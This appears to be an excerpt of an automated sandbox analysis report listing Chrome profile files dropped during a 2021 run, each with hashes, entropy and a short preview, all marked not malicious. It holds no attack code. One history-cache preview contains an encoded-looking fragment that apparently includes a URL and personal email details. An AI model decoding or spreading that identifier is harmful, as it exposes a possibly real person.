Preview:	{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_1\_metadata\computed_hashes.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	23474
Entropy (8bit):	6.059847580419268
Encrypted:	false
SSDEEP:	384:7dNc1NC6IcafusK4H1IIGRlhKlkIALQWdynQh2RX4K6M1tVztzr7XSNyzH:7dOscSRKc1nGRSkIhEw6M1tf7SNyb
MD5:	6AE2135EA4583C2F06CDEBEA4AE70FA4
SHA1:	DCEB26C7F02D53B5F214305F4C75B4A33A79CDC2
SHA-256:	03AA1944CB3C4F39E20B6361571BC45DFBEBD3FFDA3D8F148CC6ECB29958F903
SHA-512:	B5945E67D9F73DD1982D687E5C6D9B5D6B3886C8050363A259755C76AC0F93651F3425FA7C21AA6A13977AC1C8C9322F998F131648CB8909096058D4F0D23312
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["DOZdV3jFvk12AM2JNDYKo3KZrIVRprmJ+sVGWkqqE4Q=","rVElW3Hu3T52SzDDUqGT5YiJTBGUv2h3pNuBKFlhZ1U=","X/3fg4KZxgQ1jBr5QGq0F5JnflgE27UErd88mrxTcxs=","VibLbpy0ig+5INMOU71fTYN76iaka2XVpmm1qAKYsX8=","EChCwCbQHbHQ7oDdGT2qNyiRJ0yck2YC2emNGq4whtE="],"block_size":4096,"path":"_locales/iw/messages.json"},{"block_hashes":["xklkoZ7iSU1+7cd6DAtEmUC5lPFd+EgcbnzxkOiFwlk=","3KbsvoxKY/3AwqgF2aAdVQRpMhsNVRkQ3rx2A6Z2Z+Y=","o9+tsohquaCMj+70zeinRG/hBhA2uLoDl/WoC1uokME=","xV/K8xucyWJELVT8Cqn+ugFjobBVmg8pnmACF+2PP4Y=","p/mvJm2wuCl32Rx3it654MljKAsMe3S9IDEabc1A8mE=","j8mPrTb5oOsBTj2Fer78JE6xG6+kR64Cvu2SW8d3j/k=","nqSRpGQ3USU2bZJsZ+AzBmFOyann8omwJrhEWFZDTXc=","eTcQyJUuNuF9yCga/fXGyFCj/pysSceanhBzksdx23s=","Wj7faqnspelXKMvnduxHn1XUBG8TEOqyns7/oUihekM=","VtBwXoadI3EP336rAiL33Gz19KGqtN+RYdKnMKAXoLw=","iDgLXQqXJp8nCZxgLuC9LXM45DGfufvGnXvmHsn18wc=","g+RfdDfrWTUK0Pkcsbot7NJ4SC9wVRV/dVVMuHAtEj8=","2oC4HcCuXu3VjFf6wnKlznt9uqQNaebcuWpm/mWj69U=","aMUIpuFqPMiieSaWhIktCK62v2P3OZQAWupWsYzCnvk=","L

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	2.7076205028080005
Encrypted:	false
SSDEEP:	96:zBC7wbWsTdCZI0qaMbKMEgY3NWREg8nXt5Gu6owWp090ksTdCZI0qawAfbiySkq:VA2p0qlW8B4bGV04f2p0q8Gy+
MD5:	731C548EF45E50C9DD15CD47F4650AB2
SHA1:	F83ECFD8828E7A18955B7E775FF560467C9E6B72
SHA-256:	93D264D8B9C0CCD8F3AE19C7A42E4BDAF6899448137292E337E293DD568A4CA0
SHA-512:	FB4D0261D4D770466BEFAF7DFC3D581DBA352A9B5CFED0B1BB5919CE0DF08F1ADA21E906B76D22CC64BFFAC8FC89098C4E08B50A77CB5B9B8A0E7451CE10C4CB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	31888
Entropy (8bit):	1.1517093989146199
Encrypted:	false
SSDEEP:	48:ldBmw6fUq413r7x2YKR1QTdiPZI0HNC1aEKDbQMeLwQMW4:ldBCZ4V7x2sTdCZI0qaEsbIwH
MD5:	D46E4499EC999229A817CCEE44785FC3
SHA1:	16CAD431F8FD78C6D0D9EB7330375798ACA4A16B
SHA-256:	D1C91158C510488D5C330BB4932993CB67DC5E9B9F11EA46E1A6BAC8DE420F67
SHA-512:	03A719EEDA1D06709F09C0269AD16FECE3764DADF58A90AE8EAACEBAC3D1C82F5E0D1522F99819438D0B0EC3818EFCCEEEA8DCB3B45B50B15013264C95A1E8B7
Malicious:	false
Preview:	...............D........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	19
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlX:qT
MD5:	0407B455F23E3655661BA46A574CFCA4
SHA1:	855CB7CC8EAC30458B4207614D046CB09EE3A591
SHA-256:	AB5C71347D95F319781DF230012713C7819AC0D69373E8C9A7302CAE3F9A04B7
SHA-512:	3020F7C87DC5201589FA43E03B1591ED8BEB64523B37EB3736557F3AB7D654980FB42284115A69D91DE44204CEFAB751B60466C0EF677608467DE43D41BFB939
Malicious:	false
Preview:	.f.5...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	372
Entropy (8bit):	5.250575498057044
Encrypted:	false
SSDEEP:	6:mXFKq2PWXp+N23iKKdK25+Xqx8chI+IFUtp8FwXZmwP8FrkwOWXp+N23iKKdK25N:sFKva5KkTXfchI3FUtp8Fc/P8Fr5f5KN
MD5:	8B965EF8D3035D05157BEF202312F06F
SHA1:	5A1D400343ECCA89B9A5B9C615C8E82910F02F4E
SHA-256:	183F1B8CE2CBF572221B64E04F979C19BDBA76708577CE90241FA67BF6356B63
SHA-512:	199F1647C84FBF3D37D643C6546632A944A8A50FBE187737A8BFAA03D80108A4D70A5458DF079DD36B50C409EC078C4EABF942AA2178D0E122DB3C229042D2DC
Malicious:	false
Preview:	2021/05/12-21:52:09.932 1830 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/05/12-21:52:09.933 1830 Recovering log #3.2021/05/12-21:52:09.934 1830 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.212237070518195
Encrypted:	false
SSDEEP:	6:mXFL9q2PWXp+N23iKKdK25+XuoIFUtp8FrXZmwP8FYekwOWXp+N23iKKdK25+Xu6:sFL9va5KkTXYFUtp8F7/P8FP5f5KkTXp
MD5:	689A075DCC1EE7CEF229A5105E6E92B2
SHA1:	66742B47D0A66B85C134AA34269664DC771629EA
SHA-256:	0D77B93062291D76911FB96B5D1A87ADC78FB7A67E8CADAD6B6709EC99F7199D
SHA-512:	A3ADAD0F056487C604AADE2988BF9CB860B7C8119BD6BBD3B61355E8AD23B16A04B6623BF827C7BC55CC71DA070D619261F8D3845564F2F2AD22F97CCDA979AC
Malicious:	false
Preview:	2021/05/12-21:52:09.924 1830 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/05/12-21:52:09.925 1830 Recovering log #3.2021/05/12-21:52:09.927 1830 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\000001.dbtmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	102
Entropy (8bit):	4.707425199545215
Encrypted:	false
SSDEEP:	3:w1tsm1iILeNlA1jPqciKPnSc+VVn:w1tsmRLVP1/Sc+VV
MD5:	7E6074135B54581D9C9A50EC25141C6A
SHA1:	362BE82BA04A240771813665F436B0EF9D24C35F
SHA-256:	8A14329F2C4F6E9CD07FDABA314C1F29FDE90C936695F0E95118778B2E0CD7A2
SHA-512:	D715BD9AE5A94DC6F30D6B8A475DFD69DE15C3915987D6A2D9E6F761237055AB1409B24431F9F6497FE0CDF664449F13F3D52FB0C49E4221CE3145862D9048F8
Malicious:	false
Preview:	mP...................LAST_PATH.-1.X7.>................LAST_PATH.000..ORIGIN:https_www.google.com_0.000

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	143
Entropy (8bit):	5.287865897724158
Encrypted:	false
SSDEEP:	3:tUKC7UrmFlLLKqFkPWXp5cViE2J5iKKKc64E/+MOMcWIDMGk4cWIV//Uv:mX7ymFN+q2PWXp+N23iKKdK29MRgPRIg
MD5:	4BD37B34F390165FFAE7C62E8AD8D21C
SHA1:	F8ECDABFE606A9A43F59B648D95FF795644727F4
SHA-256:	54B5837F37DEEAB12D4A1472C11C448522850B69BABB0ED1762843971185F720
SHA-512:	2DB8E5DB5AE8D9F18E41F9C6BE2A3996FFFD2307B1B7EA6BF2D300AEEFDAEE1363FF50AAB435E0759B431005D0DAE6741FFA68EA8E588CCE44EB5160BCA5E490
Malicious:	false
Preview:	2021/05/12-21:52:18.169 18bc Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\File System\Origins/MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.225010526974697
Encrypted:	false
SSDEEP:	6:mXFeOq2PWXp+N23iKKdKWT5g1IdqIFUtp8FXZmwP8F1ekwOWXp+N23iKKdKWT5gZ:sFrva5Kkg5gSRFUtp8FX/P8F1e5f5Kkn
MD5:	8687F051980F2F450FD8C3132493F00E
SHA1:	64F8AADB76DCBD4F9F030331AC32D54330FAD87E
SHA-256:	AF6396D59D7B6A1D1F165D494D18ADC9FA014A7AAFDF07DB06FD4C1F48041E98
SHA-512:	8AB5D60B7EDCA773858CCAFECBE52A6949B2FDC59C5A5A6F943BD3D7D4DD0432F06C1C012AC64223B869462FD73FFD151E4C0FF9186CC31EC31CD8F4C122D727
Malicious:	false
Preview:	2021/05/12-21:52:09.913 1830 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/05/12-21:52:09.914 1830 Recovering log #3.2021/05/12-21:52:09.915 1830 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	0.45488079341118026
Encrypted:	false
SSDEEP:	3:8EflbIgwl:8sdQ
MD5:	86E1A660DF7F71FB3919E55C95D2C7AF
SHA1:	6A5394FB575D67F191AEA9B0183AD147ED2BBAFE
SHA-256:	30CBCF3F8D9094CBA7B5D3DD813B18E3BB1502AAEBB638BC1973D3806879A3E1
SHA-512:	836FAF65DD23CD47E29D41DFD2168DC04202A9E234E2F77410A1E89F0AD5F4B203AE46D91A1F3EA757C4C5935879EA40644956DA46DE0392BB5C69F9230278BD
Malicious:	false
Preview:	.'..(...................................................................................................................................................................................................................................................................QC.-. /.........................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	0.6438015131822946
Encrypted:	false
SSDEEP:	48:TpS5a6Dq5Z+hjiHNfittIiwimEpQMNT5aimWxq5Ah+Q3LRtM7QMT3+k:1QDOOOIgEpLVYWhBR27ZOk
MD5:	6CA4724DEF0540368557901CE11FB131
SHA1:	E317B192430E8748C8FBE52B1737D10C5C5C9A30
SHA-256:	EFB82D2C92E94DA9DD009FCECF427A0C50DB6187B187F6DCDEAE9EEB54058FDF
SHA-512:	92D7C4118629D664194148CAACC8A7322562227DC0FFCDF4AC6D249FF84486025B0BE07574DF9DB092709F40B5048BC73BC73D1442BCC2D4FEA9C5E23A469EA4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	1327
Entropy (8bit):	5.698848058258933
Encrypted:	false
SSDEEP:	24:KVX/NFpRBs+S1ovFne6G2jBhPfLaq/SPWc7EB4yyo7nQBrxzkngz7ZpdQTdRJX5x:8ycYYfLaq/SNYBOJF/hpMtL
MD5:	AE25FE856A61AA25AEB5E1613ADC3B81
SHA1:	5B1EA771FEB48A610F7E1DC83D59A679BA1861E7
SHA-256:	C49AB29ADA7B779B78B60D6DD3A472ECC1F1423EBA673055E03653FFC4E54DDC
SHA-512:	37BE7E55BA0E997B23E8FFB51326E13310D2582F8B3C818518C3E73517DB628C161F818C5D85BB2785093E5704EA62D5118CD3A0200F15CADE65FC113E252D73
Malicious:	false
Preview:	............"......ca..esd..gov..https..loading..pheeke..wa..writerly.3ahr0chm6ly93cml0zxjses5jys8jcghlzwtlqgvzzc53ys5nb3y..com..http..rwbdg..5781525..c..desktop..file..user..html..users*........5781525...7.3ahr0chm6ly93cml0zxjses5jys8jcghlzwtlqgvzzc53ys5nb3y......c......ca......com......desktop......esd......file......gov......user......html......http......https......loading......pheeke......rwbdg......users......wa......writerly..2...#.....0........1........2........3........5.........6........7........8.........9........a............b.........c...........d............e..............f........g...........h.............i..........j........k.........l............m..........n.........o...........p...........q........r............s............t.............u........v.........w...........x........y.........z....:................................................................................................................................................................................B

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	71328
Entropy (8bit):	0.1913557177657349
Encrypted:	false
SSDEEP:	24:2qLBd3HpDnM7dzqdCOgztd4BvQyggbNfhTf6:2q/3HpDqd+Q5Lyg4fV6
MD5:	1FAAD9B0E0BD2D92C4A40A5449322D2F
SHA1:	A7CD698CDAB8CFE6B8BF8141911B55069FEB29C7
SHA-256:	771DEBD44126EE9779526E84692E00529329B3C91F7BEC125243CE338425B5F0
SHA-512:	88B135F6633A6ECD2167D996B8226EA96E842E4AB0DAD1759EC73719211FEBC619A0C7ED2D17076AD29D77A9FCC5593B5EE18F8576B155C7434F23CDBC5F800E
Malicious:	false
Preview:	............ROB.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	3314
Entropy (8bit):	5.620214435222188
Encrypted:	false
SSDEEP:	96:nlMQYkZwFLa7sLM5dbRyClbQ5fgGtrS0oe:F8yaudNyClE5fg4oe
MD5:	4BEEE312EAE48F0C8E0DEFD2B0CA5AB9
SHA1:	04D03FEFF5DB2DB79A42D8A7BADF84BE16F7C9A6
SHA-256:	E2C5710C12D19DC53CEE025BB461FF118BB430C9261A82B24B2D78EADBD9B817
SHA-512:	885DBA220C308D11301690FA123247FB3F4D341E55B13A70D622B53EAEDE69003D2F136091C0956CD98CF8DBE55C3260F447ABA211EF6EDD9409CA4DEEDDF20E
Malicious:	false
Preview:	...S...*.............META:https://www.google.com............._https://www.google.com..rc::a..NXBxbWRrbnFydDE0.,_https://www.google.com..rc::d-1620881537920w..#...-............"META:https://kristenbakercoach.com..........f.+_https://kristenbakercoach.com.._grecaptchaZ.09ANblmniNSz4-AxpfXrnlv9Nj2iv12udIikB75WhmgQvSh3Q7rhiJY9wOFmsbzzJWYrXK8Wntgniawx750PWVhtQ......./............8META:chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm.............Y_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.HangoutSinkDiscoveryService;.{"cache":{"sinks":{},"g":{},"h":null},"manualHangouts":{}}.a_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.IdGenerator.cast.RequestIdGenerator..929448000.H_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.LogManager...["[2021-05-12 21:52:11.55][INFO][mr.Init] MR instance ID: db42c7f4-17e2-495e-8380-5f382c8365af\n","[2021-05-12 21:52:11.55][INFO][mr.Init] Native Cast MRP is disabled.\n","[2021-05-12 21:52:11.55][INFO][mr.Init] N

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.140722487931549
Encrypted:	false
SSDEEP:	6:mXfzGt+q2PWXp+N23iKKdK8a2jMGIFUtp8frQZmwP8f1VkwOWXp+N23iKKdK8a23:sDva5Kk8EFUtp8TQ/P8T5f5Kk8bJ
MD5:	E55336650E692350C448F18AA5FC5520
SHA1:	52C87CA790618ADB74E7F68752FDA973F18A2C75
SHA-256:	5FAE9D5E4EB75D88B60760873E66F81143B270AD07A782F3EF21A7AA80559348
SHA-512:	36383063ECEAA666460E29D885B76C05024BDB75812B4D7ED5D5A5E0C71597445A358DB46EA31B57E8EF687A3769D125752EDF818ED97FCE60513C2FD5547511
Malicious:	false
Preview:	2021/05/12-21:52:02.385 18a8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/05/12-21:52:02.387 18a8 Recovering log #3.2021/05/12-21:52:02.388 18a8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	1.1801018721111056
Encrypted:	false
SSDEEP:	96:vOqAuhjspnWOKGkOqAuhjspnWOnoIQ0OqAuhjspnWOc86pEOqAuhjspnWO4guryZ:HL7AoU4O
MD5:	3C2ACC95760049D128E7D3290A98D65B
SHA1:	13A05983A42C8553AA1BC15A206364C02C4FFED5
SHA-256:	A1D5E9539E0A9D969C23DCE3F7F435002CBF4705C126F23E1BBD6ADFFCC972D7
SHA-512:	2C3984CD1F742A310334C2F0F8D9FA13CD84C5A2149D5D53ADC1AB4746466B34D472699E71B24430A9C876F512511CD8C414079A55EC28DA5CECFBF66973F2A3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.......,......\.t.+.>...,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	51344
Entropy (8bit):	1.0704678492943343
Encrypted:	false
SSDEEP:	96:3sUOqAuhjspnWOx+kRqpkOqAuhjspnWOu0OqAuhjspnWOzz86mEOqAuhjspnWO2:cy/piPS7Cp
MD5:	DBE71AB2B138B761E775D4508135A604
SHA1:	3AC0606DDE2662A06710A2C9261AEB4815718AE6
SHA-256:	DA5397239AAABE6A2DFA15EF3D38AFAF2BF52ED8FA51DF6D396BD7F25BF5BF4A
SHA-512:	A1D3C1623F2BB93C684376D5925076BB9123CF2054A598DC08751B355F7AB27867E79E03CF3CCF5DC098E6B1A5DC0E483FB1736C8C06133CA46083B6C7FD962F
Malicious:	false
Preview:	.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.174125240096378
Encrypted:	false
SSDEEP:	6:mXZG2qM+q2PWXp+N23iKKdKgXz4rRIFUtp8ZWZmwP8ZIiMMVkwOWXp+N23iKKdKt:sZR3+va5KkgXiuFUtp8ZW/P8ZIiNV5fR
MD5:	6BF424B9F159ABE5CE3CB2750F9BA1CB
SHA1:	0F3881D6578B30888EBB9A09725E1C5A2A1A3A3D
SHA-256:	A9E20CDAFDE2001A2064C2F92454507046C96B707D6712E2C55E8B3E20352C7A
SHA-512:	5A537206D43E7000905ECA7B7BF412B5E65707E315BE585385EB4BBEA596D77679869670A0341F4AF4E9BA1B7BE80587FCD42D1CC247D05575FCE917CB320742
Malicious:	false
Preview:	2021/05/12-21:52:02.556 18ac Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/MANIFEST-000001.2021/05/12-21:52:02.557 18ac Recovering log #3.2021/05/12-21:52:02.558 18ac Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\QuotaManager Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	0.4789849553930401
Encrypted:	false
SSDEEP:	96:vCIG+6bDdsDaBJvtHIm50I4sX/CIG+6bDdsDaBJvtHIm50I4erx:a96EJTv4sXK96EJTv4erx
MD5:	063AF9F174F953B724D9B9C3C3D38690
SHA1:	1D90DFF9D2097AF2CD4C3F33B9A1405F0FA22258
SHA-256:	7D1428A6FC26DEF8071F9B6EA35478695F8BFB67EDE149A2A87AB6CC0A328D63
SHA-512:	C8DEA2B3737E393B35E4660CF9281FF96A26DE45470BB77E54CB102C4990B323E3B186B076C6C5F55FD5EBCD83BBF90CE36EC1FC4102537E99F0FAFA1EAD6EE7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C..........g.....*.W.L.[......."......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	25672
Entropy (8bit):	0.6528149406462753
Encrypted:	false
SSDEEP:	48:mMvYqzLbCIG+6bDdsDaKgJgKtHIm50I9a+UV5:m2YsCIG+6bDdsDaBJvtHIm50I4F
MD5:	F818BC4C01EEDEE12328AADCD9742587
SHA1:	8D9834318343BC161F7301FE277ED960E5EF9B2D
SHA-256:	42068A49AD5D6DD2CA93E1347AFF0967B65AE7D55C832B5B275F999F35C93FB3
SHA-512:	B54718ABD962EAC69318B8850B61E839038FA123C526E503ABE643B8DF3EDEF146E8585C08B8801A4C4CECB6790B009AEE0453AF13D5519DE57F71275F82A88D
Malicious:	false
Preview:	.............I@x.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... .c..................Yr~............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.9682096612184792
Encrypted:	false
SSDEEP:	48:TUIopK2rJNVr1GJmm8pF82phrJNVrdHX/cjrJN2yJ1n4n1GmhGU1TwWxoTRsAwWk:wIElwQF8mpcSSuk6ydi1
MD5:	12DBC88693C79F2A4AC950697DBF8B32
SHA1:	09185BA95A82F983F60CE8281CCE4EF176BD7F2A
SHA-256:	B7761D8B62156EF49A67F7B1FD58A50619BB7D0026BD3EBFDF47F63B41ABC714
SHA-512:	E725BD850B5D5F46201FCB96CE8DE686DE6ADEEC56F5A1534DAADB76303290B32F86E8F9BF951BBF3051AC10E9D7DC731EFB4D827B95F5040BF2B3B9D68741B8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C..........g...^.........j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL-journal Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	29252
Entropy (8bit):	0.6278069825859534
Encrypted:	false
SSDEEP:	48:uQqkIopK2rJNVr1GJmm8pF82phrJNVrdHX/cjrJN2yJ1n4n1GmhGUX4:uQhIElwQF8mpcSs
MD5:	9E1C9039AAB2F67E85FD7B00624534DD
SHA1:	8CE98EC0D90BC1F3B0AA95D39DE5343499CFE9F3
SHA-256:	904119C4E80D7E01DEEC93DEAD4395C04AF3C2574D0232E24F078C75AB83518C
SHA-512:	9E62FE12F35768E2D0868F812C4D99CFF5395F76EE1FB50FA9528DD94F4C04647D9D701CE3AF14B9CE5C2C49BBDC56D3A6C1BEB2DC5833404E0A63A1E11A286E
Malicious:	false
Preview:	............I...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	1089
Entropy (8bit):	4.354472184732144
Encrypted:	false
SSDEEP:	24:7NnmQAWJ8KExfqQEofk0F/D2LtCPVy3k8:7NCWoyQZf9F/v
MD5:	73D9594D15F93BBCE90C635CFBCCDB30
SHA1:	37623D088147D9A07FBABB038C3CAE3E0E780447
SHA-256:	61EACE2F4426EBE3CED5D12F225947479D9AE95EFF8A8F169A31E4CA603934B0
